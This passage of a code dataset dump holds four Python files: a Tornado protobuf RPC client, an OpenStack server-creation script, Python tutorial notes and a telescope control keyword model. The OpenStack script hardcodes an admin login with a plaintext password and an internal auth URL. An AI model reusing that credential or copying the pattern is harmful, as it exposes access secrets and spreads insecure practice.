LOG = log.getLogger(\"Client\")\n\n def __init__(self, port, io_loop=None, **kwargs):\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self.host, self.port = inet_address(port)\n self.tcp_client = TCPClient(io_loop=self.io_loop)\n self.queue = queues.Queue()\n self._connect_future = None\n self.stream = None\n self.close_timeout = None\n self._call_count = 0\n self._max_count = 100 # TODO disconnect after this many requests\n self._process_queue()\n\n def get_service_name(self):\n raise NotImplementedError()\n\n def CallMethod(self, method_descriptor, rpc_controller, request, response_class, done):\n self._call_count += 1\n future = tornado.gen.Future()\n self.queue.put((request, method_descriptor, response_class, future))\n self.LOG.debug(\"added %s to call queue, qsize %s\", method_descriptor.name, self.queue.qsize())\n self.set_close_timeout()\n return future\n\n def set_close_timeout(self, d=60):\n if 
self.close_timeout:\n self.io_loop.remove_timeout(self.close_timeout)\n self.close_timeout = self.io_loop.add_timeout(datetime.timedelta(seconds=d), self.close)\n\n def close(self):\n self.LOG.info(\"stream close\")\n if self.stream:\n try:\n self.stream.close()\n except:\n pass\n self._connect_future = self.stream = None\n self._call_count = 0\n if self.close_timeout:\n self.io_loop.remove_timeout(self.close_timeout)\n\n @tornado.gen.coroutine\n def connect(self):\n self.LOG.info(\"client start connect\")\n while 1:\n try:\n self.stream = yield self.tcp_client.connect(self.host, self.port)\n self.LOG.info(\"client connect %s:%s success\", self.host, self.port)\n break\n except StreamClosedError:\n self.LOG.info(\"stream closed error sleep 3 reconnect queue size %s\", self.queue.qsize())\n yield tornado.gen.sleep(3)\n continue\n yield self.stream.write_sign()\n yield self.write_header(self.stream)\n raise tornado.gen.Return(self.stream)\n\n @tornado.gen.coroutine\n def _process_queue(self):\n while 1:\n request, method_descriptor, response_class, future = yield self.queue.get()\n self.LOG.debug(\"call %s start\", method_descriptor.name)\n if not self._connect_future:\n self._connect_future = self.connect()\n stream = yield self._connect_future\n self.LOG.info(\"call %s success queue size %s\", method_descriptor.name, self.queue.qsize())\n try:\n yield self.write_request(stream, request, method_descriptor)\n response = yield self.receiver(stream, response_class)\n future.set_result(response)\n except Exception as e:\n traceback.print_exc()\n self.close()\n self.LOG.error(e)\n future.set_exception(e)\n finally:\n if self._call_count > self._max_count:\n self.close()\n\n @tornado.gen.coroutine\n def write_request(self, stream, request, method_descriptor):\n self.set_close_timeout()\n yield stream.write1(CallHeader(service=self.get_service_name(),\n method_index=method_descriptor.index).SerializeToString())\n yield stream.write1(request.SerializeToString())\n\n @tornado.gen.coroutine\n def receiver(self, stream, response_class):\n self.set_close_timeout()\n header_data = yield stream.read1()\n header = ResponseHeader()\n header.ParseFromString(header_data)\n if header.status != OK:\n raise ResponseStatusError(header.status, header.message)\n else:\n data = yield stream.read1()\n response = response_class()\n response.ParseFromString(data)\n raise tornado.gen.Return(response)\n\n @tornado.gen.coroutine\n def write_header(self, stream):\n header = RequestHeader()\n yield stream.write1(header.SerializeToString())\n","sub_path":"management/ipc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"252550448","text":"import openstack\nfrom openstack.config import loader\nimport sys\n\nconfig = loader.OpenStackConfig()\n\ndef _get_resource_value(resource_key, default):\n return config.get_extra_config('example').get(resource_key, default)\n\n\nSERVER_NAME = 'prototipo2'\nIMAGE_NAME = 'bionic'\nFLAVOR_NAME = 'm1.small'\nNETWORK_NAME = 'internal'\nKEYPAIR_NAME = 'mykey'\n\n\n\n\ndef create_connection(auth_url, region, project_name, username, password):\n\n return openstack.connect(\n auth_url=auth_url,\n project_name=project_name,\n username=username,\n password=password,\n region_name=region,\n app_name='examples',\n app_version='1.0',\n )\n\ndef list_flavors(conn):\n print(\"List Flavors:\")\n\n for flavor in conn.compute.flavors():\n print(flavor)\n\n\ndef 
create_server(conn):\n print(\"Create Server:\")\n\n image = conn.compute.find_image(IMAGE_NAME)\n flavor = conn.compute.find_flavor(FLAVOR_NAME)\n network = conn.network.find_network(NETWORK_NAME)\n keypair = conn.compute.find_keypair(KEYPAIR_NAME)\n\n server = conn.compute.create_server(\n name=SERVER_NAME, image_id=image.id, flavor_id=flavor.id,\n networks=[{\"uuid\": network.id}], key_name=keypair.name)\n\n server = conn.compute.wait_for_server(server)\n\n\ndef delete_server(conn):\n print(\"Delete Server:\")\n\n server = conn.compute.find_server(SERVER_NAME)\n\n print(server)\n\n conn.compute.delete_server(server)\n\n\nconn = create_connection(\"http://192.168.0.26:5000/v3\", \"RegionOne\", \"admin\", \"admin\", \"uSh1eexei2waich7\")\nprint(conn)\n\nlist_flavors(conn)\ncreate_server(conn)\ndelete_server(conn)\n","sub_path":"Roteiro3/prototipo2_H3.py","file_name":"prototipo2_H3.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"526499962","text":"x = 2\nhelp(x) # shows the info of x\n\ndir() # lists the names in a particular namespace\nglobals() and locals() # show the values associated with the objects\n\n5 // 2 # truncation of the division result\nx = (3+2j) ** (2+3j) # there must be a number before j to indicate it is a complex number\nx.real\nx.imag\nround(3.49) # result is 3, while round(3.6) is 4. This is a built-in function\nimport math\nmath.ceil(3.49) # this gives 4\n\n#boolean\nx = False\nnot x # True\n\n#list\n# A list can be indexed from its front or back\nx = [\"first\", \"second\", \"third\", \"fourth\"]\nx[-1]\nx[0] # starting from 0\nx[:3]\nx[-2:]\nx[0:3] # starts from x[0] but ends at x[2] which is right before x[3]\nx[0:2] = [6.0, 6.5, 7.0] # the size of the list increases or decreases if the new\n# slice is bigger or smaller than the slice it's replacing.\n\nx = [1,2,3,4,5,6,7,8,9]\nlen(x) # 9\n[-1,0] + x # [-1,0,1,2,..]\nx.reverse()\n2 * x # [1,2,3,...9,1,2,..9] concatenates two copies of x\n\n\n# Tuples\n# Tuples are like lists but are immutable. 
There are only two methods for Tuples: count and index\n(1,) # one element tuple needs a comma\nx = [1,2,3,4]\ntuple(x) # convert a list to a tuple\nlist(x) # convert a tuple back to a list\n\n\n# strings\n# Strings can be delimited by single (' '), double (\" \"), triple single (''' '''), or triple\n#double (\"\"\" \"\"\") quotations and can contain tab (\\t) and newline (\\n) characters.\n\nx = \"live and let \\t \\tlive\"\nx.split() # ['live','and','let','live']\nx.replace(\"let \\t \\tlive\", \"enjoy life\") # 'live and enjoy life'\nimport re\nregexpr = re.compile(r\"[\\t ]+\")\nregexpr.sub(\" \", x) # yields 'live and let live'\n# The re module provides regular expression functionality.\n\ne = 2.718\nx = [1, \"two\", 3, 4.0, [\"a\", \"b\"], (5, 6)]\nprint(\"The constant e is:\", e, \"and the list x is:\", x)\n#The constant e is: 2.718 and the list x is: [1, 'two', 3, 4.0,\n#['a', 'b'], (5, 6)]\nprint(\"the value of %s is: %.2f\" % (\"e\", e))\n#the value of e is: 2.72\n#The % operator provides a formatting capability similar to that of C’s sprintf.\n\n# Dictionaries\nx = {1: \"one\", 2: \"two\"}\nx[\"first\"] = \"one\"\nx[(\"Delorme\", \"Ryan\", 1995)] = (1, 2, 3)\nlist(x.keys())\n# ['first', 2, 1, ('Delorme', 'Ryan', 1995)]\nx[1]\n#'one'\nx.get(1, \"not available\")\n#'one'\nx.get(4, \"not available\")\n#'not available'\n\n# Sets\n# A set in Python is an unordered collection of objects, used in situations where membership\n#and uniqueness in the set are the main things you need to know about that object.\n\nx = set([1, 2, 3, 1, 3, 5])\nx\n#{1, 2, 3, 5}\n1 in x\n#True\n4 in x\n#False\n\n# function\n\ndef funct3(x, y=1, z=1, *tup):\n print((x, y, z) + tup)\n \nfunct3(2)\n#(2, 1, 1)\nfunct3(1, 2, 3, 4, 5, 6, 7, 8, 9)\n#(1, 2, 3, 4, 5, 6, 7, 8, 9)\ndef funct4(x, y=1, z=1, **dictionary):\n\tprint(x, y, z, dictionary)\nfunct4(1, 2, m=5, n=9, z=3)\n#1 2 3 {'n': 9, 'm': 5}\n\n# Module Creation\n\"\"\"wo module. Contains function: words_occur()\"\"\"","sub_path":"Quick_python_book1.py","file_name":"Quick_python_book1.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"316510178","text":"#!/usr/bin/env python\n\"\"\"An object that models the current state of the TCC.\n\nIt contains instance variables that are KeyVariables\nor sets of KeyVariables. 
Most of these are directly associated\nwith status keywords and a few are ones that I generate.\n\nThus it is relatively easy to get the current value of a parameter\nand it is trivial to register callbacks for when values change\nor register ROWdg widgets to automatically display updating values.\n\n2003-03-26 ROwen\n2003-04-02 ROwen Added axis limits and iimScale.\n2003-04-04 ROwen Added all offsets and axis limits.\n2003-04-07 ROwen Bug fix: iimScale was not being dispatched.\n2003-04-14 ROwen Removed unused imports.\n2003-04-29 ROwen Bug fix: RotExists was int, not bool;\n this caused failure in Python 2.3b1.\n2003-05-08 ROwen Modified to use RO.CnvUtil.\n2003-05-28 ROwen Added slewDuration and slewEnd;\n changed coordSys and rotType to expand the short names\n used by the TCC to the longer names used internally in TUI.\n2003-06-09 ROwen Modified to get the dispatcher from TUI.TUIModel.\n2003-06-11 ROwen Renamed coordSys -> objSys;\n modified objSys to use RO.CoordSys constants instead of names;\n made keyword Inst uppercase.\n2003-10-30 ROwen Added tccPos.\n2003-12-03 ROwen Added guidePrep, guideStart\n2004-01-06 ROwen Modified to use KeyVarFactory.\n2004-08-11 ROwen Modified to allow NaN for the axis status word\n in ctrlStatusSet (this shows up as \"None\" as isCurrent=True).\n Bug fix: was not refreshing rotator status in ctrlStatusSet;\n modified to optionally refresh it (since it may be missing)\n using new refreshOptional argument in RO.KeyVariable.KeyVarFactory.\n2005-06-03 ROwen Improved indentation uniformity.\n2006-02-21 ROwen Modified to use new correctly spelled keyword SlewSuperseded.\n2006-03-06 ROwen Added axisCmdState (which supersedes tccStatus).\n Modified to set rotExists from axisCmdState (instead of tccStatus)\n and to only set it when the state (or isCurrent) changes.\n2007-01-29 ROwen Added instPos, gimCtr, gimLim, gimScale.\n2007-07-25 ROwen Added tai and utcMinusTAI.\n2007-09-28 ROwen Modified _cnvRotType to raise ValueError instead of KeyError for bad values\n (because keyword conversion functions should always do that).\n Modified _cnvObjSys to raise ValueError instead of returning None for bad values.\n2008-02-01 ROwen Fixed rotType; it was always set to None due to an error in _cnvRotType.\n2008-03-25 ROwen Removed obsolete gcFocus; get gmech focus from the gmech actor.\n2010-03-04 ROwen Added moveItems.\n2010-06-28 ROwen Removed unused _RotTypeDict (thanks to pychecker).\n2010-09-24 ROwen Added keywords.\n2011-07-14 ROwen Added ipConfig, gcFocus, gcFocusLim, gcNomFocus, instFocus, rotInstXYAng and rotOffsetScale;\n all of these except ipConfig and gcFocus are new in TCC 2.15.0.\n2014-04-23 ROwen Added gProbeDict\n2014-07-21 ROwen Added DesEncMount and EncMount.\n\"\"\"\nfrom collections import OrderedDict\n\nimport RO.CnvUtil\nimport RO.CoordSys\nimport RO.KeyVariable\nimport TUI.TUIModel\n\n_theModel = None\n\ndef getModel():\n global _theModel\n if _theModel == None:\n _theModel = _Model()\n return _theModel\n\ndef _cnvObjSys(tccName):\n \"\"\"Converts a coordinate system name from the names used in the TCC keyword ObjSys\n to the RO.CoordSys constants used locally. 
Case-insensitive.\n\n Raise ValueError if tccName not a valid TCC ObjSys.\n \"\"\"\n #print \"_cnvObjSys(%r)\" % tccName\n try:\n tuiName = dict(\n icrs = 'ICRS',\n fk5 = 'FK5',\n fk4 = 'FK4',\n gal = 'Galactic',\n geo = 'Geocentric',\n topo = 'Topocentric',\n obs = 'Observed',\n phys = 'Physical',\n mount = 'Mount',\n none = 'None',\n )[tccName.lower()]\n except KeyError:\n raise ValueError()\n return RO.CoordSys.getSysConst(tuiName)\n\ndef _cnvRotType(tccName):\n \"\"\"Converts a rotation type name from the names used in the TCC keyword RotType\n to the (longer) names used locally. Case-insensitive.\n\n Raise ValueError if tccName not a valid TCC RotType.\n \"\"\"\n #print \"_cnvRotType(%r)\" % (tccName,)\n try:\n return dict(\n obj = 'Object',\n horiz = 'Horizon',\n phys = 'Physical',\n mount = 'Mount',\n none ='None',\n )[tccName.lower()]\n except KeyError:\n raise ValueError()\n\nclass _Model (object):\n def __init__(self,\n **kargs):\n self.actor = \"tcc\"\n self.dispatcher = TUI.TUIModel.getModel().dispatcher\n keyVarFact = RO.KeyVariable.KeyVarFactory(\n actor = self.actor,\n converters = str,\n dispatcher = self.dispatcher,\n )\n pvtVarFact = RO.KeyVariable.KeyVarFactory(\n keyVarType = RO.KeyVariable.PVTKeyVar,\n actor = self.actor,\n naxes = 1,\n dispatcher = self.dispatcher,\n )\n\n self.axisNames = (\"Az\", \"Alt\", \"Rot\")\n\n # user-specified values\n\n self.objName = keyVarFact(\n keyword = \"ObjName\",\n nval = 1,\n converters = str,\n description = \"name of current target\",\n )\n\n self.objSys = keyVarFact(\n keyword = \"ObjSys\",\n converters = (_cnvObjSys, RO.CnvUtil.asFloatOrNone),\n description = \"Coordinate system name, date\",\n defValues = (RO.CoordSys.getSysConst(\"\"), None),\n )\n\n self.netObjPos = pvtVarFact(\n keyword = \"ObjNetPos\",\n naxes = 2,\n description = \"Net object position, including user and arc offsets\",\n )\n\n self.objOff = pvtVarFact(\n keyword = \"ObjOff\",\n naxes = 2,\n description = \"Object offset (user coords)\",\n )\n\n self.objArcOff = pvtVarFact(\n keyword = \"ObjArcOff\",\n naxes = 2,\n description = \"Object arc offset (user coords)\",\n )\n\n self.rotType = keyVarFact(\n keyword = \"RotType\",\n converters = _cnvRotType,\n description = \"Type of rotation\",\n )\n\n self.rotPos = pvtVarFact(\n keyword = \"RotPos\",\n naxes = 1,\n description = \"Rotation angle\",\n )\n\n self.rotExists = keyVarFact(\n keyword = \"RotExists\",\n converters = RO.CnvUtil.asBool,\n description = \"Type of rotation\",\n isLocal = True,\n )\n\n self.boresight = pvtVarFact(\n keyword = \"Boresight\",\n naxes = 2,\n description = \"Boresight position (inst x,y)\",\n )\n\n self.calibOff = pvtVarFact(\n keyword = \"CalibOff\",\n naxes = 3,\n description = \"Calibration offset (az, alt, rot)\",\n )\n\n self.guideOff = pvtVarFact(\n keyword = \"GuideOff\",\n naxes = 3,\n description = \"Guiding offset (az, alt, rot)\",\n )\n\n # time\n\n self.tai = keyVarFact(\n keyword = \"TAI\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n refreshCmd = \"show time\", # can't use archived data!\n description = \"TAI time (MJD sec)\",\n )\n\n self.utcMinusTAI = keyVarFact(\n keyword = \"UTC_TAI\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"UTC time - TAI time (sec)\",\n )\n\n # slew info; do not try to refresh these keywords\n\n self.moveItems = keyVarFact(\n keyword = \"MoveItems\",\n nval = 1,\n converters = str,\n description = \"\"\"Indicates which user-set position attributes have been changed for a move.\n\nThis keyword always 
appears with Moved or SlewBeg, and never appears any other time.\nThe value is a string containing the following characters, each of which is either\n\"Y\" (yes, this item changed) or \"N\" (no, this item did not change):\n0 object name\n1 any of object position, coordinate system, epoch, proper motion, etc., but NOT offset (see below)\n2 object magnitude\n3 object offset\n4 arc offset (e.g. for drift-scanning)\n5 boresight position\n6 rotator angle or type of rotation\n7 guide offset\n8 calibration offset\n\"\"\",\n allowRefresh = False,\n )\n\n self.slewDuration = keyVarFact(\n keyword=\"SlewDuration\",\n converters=RO.CnvUtil.asFloatOrNone,\n description = \"Duration of the slew that is beginning (sec)\",\n allowRefresh = False,\n )\n\n self.slewEnd = keyVarFact(\n keyword = \"SlewEnd\",\n nval = 0,\n description = \"Slew ended\",\n allowRefresh = False,\n )\n\n self.slewSuperseded = keyVarFact(\n keyword = \"SlewSuperseded\",\n nval = 0,\n description = \"Slew superseded\",\n allowRefresh = False,\n )\n\n # computed information about the object\n\n self.objInstAng = pvtVarFact(\n keyword = \"ObjInstAng\",\n naxes = 1,\n description = \"angle from inst x to obj user axis 1 (e.g. RA)\",\n )\n\n self.spiderInstAng = pvtVarFact(\n keyword = \"SpiderInstAng\",\n naxes = 1,\n description = \"angle from inst x to dir. of increasing az\",\n )\n\n keyVarFact.setKeysRefreshCmd()\n\n # information about the axes\n\n self.tccStatus = keyVarFact(\n keyword = \"TCCStatus\",\n nval = 2,\n converters = str,\n description = \"What the TCC thinks the axes are doing\",\n )\n\n self.axisCmdState = keyVarFact(\n keyword = \"AxisCmdState\",\n nval = 3,\n converters = str,\n description = \"What the TCC has told the azimuth, altitude and rotator to do\",\n )\n\n self.axisErrCode = keyVarFact(\n keyword = \"AxisErrCode\",\n nval = 3,\n converters = RO.CnvUtil.StrCnv(subsDict = {\"OK\":\"\"}),\n description = \"Why the TCC is not moving azimuth, altitude and/or the rotator\",\n )\n\n self.tccPos = keyVarFact(\n keyword = \"TCCPos\",\n nval = 3,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Target position of azimuth, altitude and rotator (limited accuracy)\",\n )\n\n self.axePos = keyVarFact(\n keyword = \"AxePos\",\n nval = 3,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual position of azimuth, altitude and rotator (limited accuracy)\",\n )\n\n self.azLim = keyVarFact(\n keyword = \"AzLim\",\n nval = 5,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Azimuth limits: min pos, max pos, vel, accel, jerk\",\n )\n\n self.altLim = keyVarFact(\n keyword = \"AltLim\",\n nval = 5,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Altitude limits: min pos, max pos, vel, accel, jerk\",\n )\n\n self.rotLim = keyVarFact(\n keyword = \"RotLim\",\n nval = 5,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Rotator limits: min pos, max pos, vel, accel, jerk\",\n )\n\n self.rotOffsetScale = keyVarFact(\n keyword = \"RotOffsetScale\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Rotator offset, scale: mount position = offset + (physical position * scale).\",\n )\n\n # a set of controller status variables for each axis;\n # the entry for each axis consists of:\n # current position, velocity, time, status word\n #\n # the rotator does not have a refresh command because it may not exist\n self.ctrlStatusSet = [\n keyVarFact(\n keyword = \"%sStat\" % axisName,\n nval = 4,\n converters = (RO.CnvUtil.asFloatOrNone, RO.CnvUtil.asFloatOrNone,\n 
RO.CnvUtil.asFloatOrNone, RO.CnvUtil.asIntOrNone),\n description = \"%s controller status word\" % axisName,\n refreshOptional = (axisName == self.axisNames[-1]),\n ) for axisName in self.axisNames\n ]\n\n # instrument data\n\n self.instName = keyVarFact(\n keyword = \"Inst\",\n converters = str,\n description = \"Name of current instrument\",\n )\n\n self.instPos = keyVarFact(\n keyword = \"InstPos\",\n converters = str,\n description = \"Name of current instrument position\",\n )\n\n self.ipConfig = keyVarFact(\n keyword = \"IPConfig\",\n converters = str,\n description = \"\"\"Instrument-position configuration, e.g. is an instrument rotator available?\n\nstr contains the following elements, each of which is either \"T\" (true) or \"N\" (false):\n\ninstrument rotator is available\nguide camera is available\nguider mechanical controller is available\n\"\"\",\n )\n self.ipConfig.addIndexedCallback(self._updRotExists)\n\n self.instFocus = keyVarFact(\n keyword = \"InstFocus\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Secondary mirror focus offset due to instrument (um)\",\n )\n\n self.iimCtr = keyVarFact(\n keyword = \"IImCtr\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Center of current instrument (unbinned pixels)\",\n )\n\n self.iimLim = keyVarFact(\n keyword = \"IImLim\",\n nval = 4,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Edges of current instrument (min x, min y, max x, max y) (unbinned pixels)\",\n )\n\n self.iimScale = keyVarFact(\n keyword = \"IImScale\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Scale of current instrument (unbinned pixels/deg)\",\n )\n\n self.rotInstXYAng = keyVarFact(\n keyword = \"RotInstXYAng\",\n nval = 3,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Position of the center of the instrument rotator in instrument coordinate frame (x, y deg) \" +\n \"and angle of instrument rotator x axis in instrument coordinate frame (deg).\",\n )\n\n # guider data\n\n self.gimCtr = keyVarFact(\n keyword = \"GImCtr\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Center of current guider (unbinned pixels)\",\n )\n\n self.gimLim = keyVarFact(\n keyword = \"GImLim\",\n nval = 4,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Edges of current guider (min x, min y, max x, max y) (unbinned pixels)\",\n )\n\n self.gimScale = keyVarFact(\n keyword = \"GImScale\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Scale of current guider (unbinned pixels/deg)\",\n )\n\n self.gcFocus = keyVarFact(\n keyword = \"GCFocus\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"User-specified focus offset for guide camera (um).\",\n )\n\n self.gcFocusLim = keyVarFact(\n keyword = \"GCFocusLim\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Limits of travel for guide camera focus actuator (um)\",\n )\n\n self.gcNomFocus = keyVarFact(\n keyword = \"GCNomFocus\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Nominal position for guide camera focus actuator (um).\",\n )\n\n self.ptErrProbe = keyVarFact(\n keyword = \"PtErrProbe\",\n nval = 1,\n converters = RO.CnvUtil.asIntOrNone,\n description = \"Guide probe to use for pointing error data collection; 0 if none.\",\n )\n\n self.gProbeInfo = keyVarFact(\n keyword = \"GProbeInfo\",\n converters = (\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asBool,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n 
RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Information about one guide probe:\n - guide probe number (1...N)\n - exists?\n - x center (pixels)\n - y center (pixels)\n - min x (pixels)\n - min y (pixels)\n - max x (pixels)\n - max y (pixels)\n - x position of center of guide probe w.r.t. rotator (deg)\n - y position of center of guide probe w.r.t. rotator (deg)\n - angle from probe image x to rotator x (deg)\n \"\"\",\n allowRefresh = False,\n )\n self.gProbeDict = OrderedDict() # dict of guide probe number: GuideProbe object; based on GProbeInfo keyword\n self.gProbeInfo.addCallback(self._updGProbeDict)\n\n # miscellaneous\n\n self.ptCorr = keyVarFact(\n keyword = \"PtCorr\",\n converters = (\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Measured pointing error in a form suitable for guiding\n (thus, relative to current guide and calibration offsets).\n All values are in the pointing frame, which is the rotator frame rotated such that x = az\n - az pointing correction on the sky (deg)\n - alt pointing correction on the sky (deg)\n - x position in pointing frame (deg)\n - y position in pointing frame (deg)\n \"\"\",\n allowRefresh = False,\n )\n\n self.ptData = keyVarFact(\n keyword = \"PtData\",\n converters = (\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Measured pointing error in a form suitable for pointing model data\n - az desired physical position (deg)\n - alt desired physical position (deg)\n - az current mount position (deg)\n - alt current mount position (deg)\n - rot physical angle (deg)\n \"\"\",\n allowRefresh = False,\n )\n\n self.ptRefStar = keyVarFact(\n keyword = \"PtRefStar\",\n converters = (\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n str,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Information about a pointing reference star:\n - equatorial position (deg)\n - polar position (deg)\n - parallax (arcsec)\n - equatorial proper motion (dEquatAng/dt as arcsec/year)\n - polar proper motion (arcsec/year)\n - radial velocity (km/sec, positive receding)\n - coordinate system name\n - coordinate system date\n - magnitude\n \"\"\",\n allowRefresh = False,\n )\n\n self.secFocus = keyVarFact(\n keyword = \"SecFocus\",\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"User-defined focus offset\",\n )\n\n # mirrors\n\n self.secActMount = keyVarFact(\n keyword = \"SecActMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual mount position\",\n )\n\n self.secCmdMount = keyVarFact(\n keyword = \"SecCmdMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Commanded mount position\",\n )\n\n self.secDesOrient = keyVarFact(\n keyword = \"SecDesOrient\",\n nval = (5,6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.secOrient = keyVarFact(\n keyword = \"SecOrient\",\n nval = (5,6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual orientation (piston, x_tilt, 
y_tilt, x_trans, y_trans)\",\n )\n\n self.secOrientAge = keyVarFact(\n keyword = \"SecOrientAge\",\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Age of most recent computation of desired orientation, in sec.\"\n )\n\n self.secDesEncMount = keyVarFact(\n keyword = \"SecDesEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired encoder length based on desired orientation (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.secEncMount = keyVarFact(\n keyword = \"SecEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Measured encoder length (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.secState = keyVarFact(\n keyword = \"SecState\",\n converters = (\n str,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Mirror controller state:\n - state string, such as: \"Done\", \"Homing\", \"Moving\" or \"Failed\",\n - iteration\n - max iterations\n - remaining duration (sec)\n - total duration (sec)\n \"\"\",\n )\n\n self.secStatus = keyVarFact(\n keyword = \"SecStatus\",\n nval = (1, 6),\n converters = RO.CnvUtil.asIntOrNone,\n description = \"Status reported by each actuator.\"\n )\n\n\n self.tertActMount = keyVarFact(\n keyword = \"TertActMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual mount position\",\n )\n\n self.tertCmdMount = keyVarFact(\n keyword = \"TertCmdMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Commanded mount position\",\n )\n\n self.tertDesOrient = keyVarFact(\n keyword = \"TertDesOrient\",\n nval = (5,6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.tertOrient = keyVarFact(\n keyword = \"TertOrient\",\n nval = (5, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.tertOrientAge = keyVarFact(\n keyword = \"TertOrientAge\",\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Age of most recent computation of desired orientation, in sec.\"\n )\n\n self.tertDesEncMount = keyVarFact(\n keyword = \"TertDesEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired encoder length based on desired orientation (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.tertEncMount = keyVarFact(\n keyword = \"TertEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Measured encoder length (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.tertState = keyVarFact(\n keyword = \"TertState\",\n converters = (\n str,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Mirror controller state:\n - state string, such as: \"Done\", \"Homing\", \"Moving\" or \"Failed\",\n - iteration\n - max iterations\n - remaining duration (sec)\n - total duration (sec)\n \"\"\",\n )\n\n self.tertStatus = keyVarFact(\n keyword = \"TertStatus\",\n nval = (1, 6),\n converters = RO.CnvUtil.asIntOrNone,\n description = \"Status reported by each actuator.\"\n )\n\n # guiding state; do not 
